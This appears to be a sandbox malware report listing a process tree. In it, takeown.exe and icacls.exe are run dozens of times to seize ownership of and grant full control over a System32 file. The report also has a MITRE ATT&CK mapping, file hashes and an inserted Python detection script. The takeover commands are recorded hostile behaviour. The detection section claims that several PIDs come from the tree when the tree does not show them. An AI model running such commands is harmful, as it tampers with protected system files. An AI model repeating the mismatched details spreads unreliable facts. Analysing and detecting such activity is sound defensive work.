C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:5228
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5364
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:5520
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5568
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:5596
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5612
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:5684
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5692
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:5700
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5716
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:5724
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5732
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:5824
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5848
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:5968
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6012
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:6124
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:6140
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:4640
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2836
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:720
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4540
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:2020
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2416
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:3276
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2688
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:4144
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2440
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:428
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2476 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4908
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:4404
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2824
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:5984
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:6084 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1856
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:4888
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3648
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:4068
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1860
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:4660
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5100
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:2496
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2472
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:1224
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1360
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1976
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:5384
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2264
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:4648
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3976
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:2932
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5288
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:1168
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5212
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:1312
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5296
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:1164
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5316
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:5556
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5192
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:4636
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5624
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:5576
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5188
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:2348
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5312
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:320
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5488
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:5204
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1840
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:1896
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4764
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:5292
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1968
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:2152
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3816
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:5600
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4852
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:5812
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5704
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:5920
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5876
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:2180
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5388
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:5908
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:6040
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:5648
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5604
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:5940
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1132
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:2528
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4276
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:3604
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4532
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:60
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1560 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4224
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:1956
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4324
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:2752
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:624
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:4260 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3064
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3452
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:968
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:4060
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1052
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:3408
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1712
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2996
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:944
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4704
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:836
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:116
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:5592
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4884
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:3256
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:872
-
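The tree above is the shape a detection should key on: takeown.exe /F on a file under System32, followed by icacls.exe granting (F) on the same file, from the same parent, repeated many times. Because the sandbox's "Possible privilege escalation attempt" and "Modifies file permissions" tags land on only some of the identical invocations, a rule should match the command lines rather than any label. The following correlator is an added example for this page, not part of the report and not the sandbox's own detection logic. It runs over constructed process-creation events in the shape of parsed Sysmon Event ID 1 records; the field names, the sample's parent PID (1000; the page does not show it), the benign admin-shell activity and the timestamps are assumptions, while the takeown/icacls/conhost command lines and the PIDs 4720, 4616, 2800, 968, 4164, 2996, 3580, 3864 and 4620 are taken from the tree.

```python
"""Correlate takeown.exe -> icacls.exe ownership/ACL takeover of protected Windows files.

Added example, not the sandbox's logic. Events mimic parsed Sysmon Event ID 1
records; field names, parent PID 1000, PID 2222 and timestamps are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Locations where a non-installer process has no business taking ownership.
PROTECTED_PREFIXES = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Command lines exactly as they appear in the report's process tree.
TAKEOWN_CMD = r'"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"'
ICACLS_CMD = r'"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)'
CONHOST_CMD = r"\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"

_T0 = datetime(2024, 10, 2, 23, 56, 0)  # assumed base time (the report's submission time)


def _ev(seconds, pid, ppid, image, cmdline):
    return {"time": _T0 + timedelta(seconds=seconds), "pid": pid, "ppid": ppid,
            "image": image, "cmdline": cmdline}


# Constructed event stream: three real pairs from the tree, one dangling takeown,
# one conhost child, and an assumed benign admin shell (PID 2222) fixing a user file.
SAMPLE_EVENTS = [
    _ev(0, 4720, 1000, r"C:\Windows\System32\takeown.exe", TAKEOWN_CMD),
    _ev(1, 4616, 1000, r"C:\Windows\System32\icacls.exe", ICACLS_CMD),
    _ev(2, 2800, 1000, r"C:\Windows\System32\takeown.exe", TAKEOWN_CMD),
    _ev(3, 968, 1000, r"C:\Windows\System32\icacls.exe", ICACLS_CMD),
    _ev(4, 4164, 1000, r"C:\Windows\System32\takeown.exe", TAKEOWN_CMD),
    _ev(5, 2996, 1000, r"C:\Windows\System32\icacls.exe", ICACLS_CMD),
    _ev(6, 3580, 1000, r"C:\Windows\System32\takeown.exe", TAKEOWN_CMD),
    _ev(7, 4620, 3864, r"C:\Windows\System32\conhost.exe", CONHOST_CMD),
    _ev(8, 5000, 2222, r"C:\Windows\System32\takeown.exe",
        r'takeown.exe /F "C:\Users\Admin\Documents\old.docx"'),
    _ev(9, 5001, 2222, r"C:\Windows\System32\icacls.exe",
        r'icacls.exe "C:\Users\Admin\Documents\old.docx" /grant Admin:(F)'),
]

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline):
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]


def takeown_target(tokens):
    """Return the /F target of a takeown.exe command line, or None."""
    for i, tok in enumerate(tokens):
        if tok.upper() == "/F" and i + 1 < len(tokens):
            return tokens[i + 1]
    return None


def icacls_full_control_target(tokens):
    """Return the file icacls.exe acts on if the line grants Full control, else None."""
    if len(tokens) < 2:
        return None
    grants_full = (any(t.upper().startswith("/GRANT") for t in tokens)
                   and any("(F)" in t.upper() for t in tokens))
    return tokens[1] if grants_full else None


def is_protected(path):
    return path.lower().startswith(PROTECTED_PREFIXES)


def detect_acl_takeover(events, window=timedelta(minutes=5)):
    """Pair each takeown on a protected file with the next icacls (F) grant on the
    same file from the same parent inside `window`; one finding per parent/target."""
    by_parent = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        by_parent[ev["ppid"]].append(ev)
    findings = []
    for ppid, evs in by_parent.items():
        pending = {}  # lower-cased target -> time of the unmatched takeown
        hits = defaultdict(lambda: {"pairs": 0, "first": None, "last": None, "icacls_pids": []})
        for ev in evs:
            tokens = tokenize(ev["cmdline"])
            image = ev["image"].lower().rsplit("\\", 1)[-1]
            if image == "takeown.exe":
                target = takeown_target(tokens)
                if target and is_protected(target):
                    pending[target.lower()] = ev["time"]
            elif image == "icacls.exe":
                target = icacls_full_control_target(tokens)
                if not target or target.lower() not in pending:
                    continue
                key = target.lower()
                started = pending.pop(key)
                if ev["time"] - started <= window:
                    hit = hits[key]
                    hit["pairs"] += 1
                    hit["first"] = hit["first"] or started
                    hit["last"] = ev["time"]
                    hit["icacls_pids"].append(ev["pid"])
        for key, hit in hits.items():
            findings.append({"ppid": ppid, "target": key, **hit})
    return sorted(findings, key=lambda f: -f["pairs"])


if __name__ == "__main__":
    for f in detect_acl_takeover(SAMPLE_EVENTS):
        print(f"parent {f['ppid']}: {f['pairs']} takeown->icacls pair(s) on {f['target']} "
              f"(icacls PIDs {f['icacls_pids']}, {f['first']:%H:%M:%S}..{f['last']:%H:%M:%S})")
```

On the constructed stream this yields one finding: parent 1000, three pairs against c:\windows\system32\wowreg32.exe, with the dangling takeown (3580) left unmatched and the admin shell's work on a user document ignored by the protected-path filter. In production, correlate on the process GUID and creation time rather than on PID, since this very tree shows conhost.exe children reusing PIDs that earlier takeown/icacls instances had exited with, and maintain an allowlist of parent images (servicing and setup engines) that legitimately re-ACL System32 files. The /S host name and /U account in the takeown line are deliberately not matched; they change with the environment.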
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Event Triggered Execution (1): Change Default File Association (1)
Downloads (files written during the run)
-
Filesize: 514KB
MD5: fdd37962a54814f55dc56ef6e4a062af
SHA1: aa2423c8a3a207f607fd03f02538dbb557e69e3c
SHA256: 142a2027b957a97f2f723b605a2e2a95586dbcc54ce3a6215b0fdb04b1d047e7
SHA512: 5d4ba43c9f88c42b2321baa7dce849d1da8472ee4bba694134f4045300210ae5a8ee4b3789491f2c20b15e0e19f13ce9a3b52358256dcebbdd2dfe7117ec3ba4
-
Filesize: 514KB
MD5: ccde813d93df0efc54e4a346df173075
SHA1: d2211031e75c1b2c8499cc6320499fd97dbd5819
SHA256: e26c0e4c063a840d34212f0973816ae4bee56e92a52a0ece8c2cf765d079e1bc
SHA512: 4b5ea53fabc7edf037e4b4809f68d5120a58395c27def5529af5a06d92c50b2bd98dce540a4aeceb4690b2ae2481f4857d411a42227adb087b11427f180e859d
-
Filesize: 514KB
MD5: 36549e81f1ad0a1fde7a0f1ce6ff37c8
SHA1: b25177a72bd9901d52bb3a2e6a0c996a7acec7aa
SHA256: 7445a962f7a28a1364e87a1c01c5a4e9a60a02e9bf20945f42f80b3b8b96b99c
SHA512: 47d5b15a86c99eeb09ad30db9215daccd1bf19a7562ea49328a61cb8a81269d8d5108a36fe77c7acc4774a67df0e5865166c00fc68dd2b91cb2cff2ed726d44e
-
Filesize: 448KB
MD5: 0a5ead827c6bb13f7252fa02872436f1
SHA1: 784a3ff7a2b1a1f96d2c1b67c141e21a2ac7faa4
SHA256: 6f1d6c5e3c0110e6b658f8db6938a128b6d51f89dd8e8a74e13c03e7c01b1770
SHA512: f4146c306ee5bd226bc6e60a294d19ef0a544dff9a4f27faffaa4059a9dcf05598184afef31cdb999b064c893ca484d8d6e6ebdf1e990ceeef56c6a791c440a1
-
Filesize: 64KB
MD5: 83cba40e6aea8cb582a53c8b772a0413
SHA1: da36f9bd8290c62c4e0dcc5d503d74618759979f
SHA256: f485d1c36ef4591406816740d211d5297bb569ce597b085419364cf469bf57de
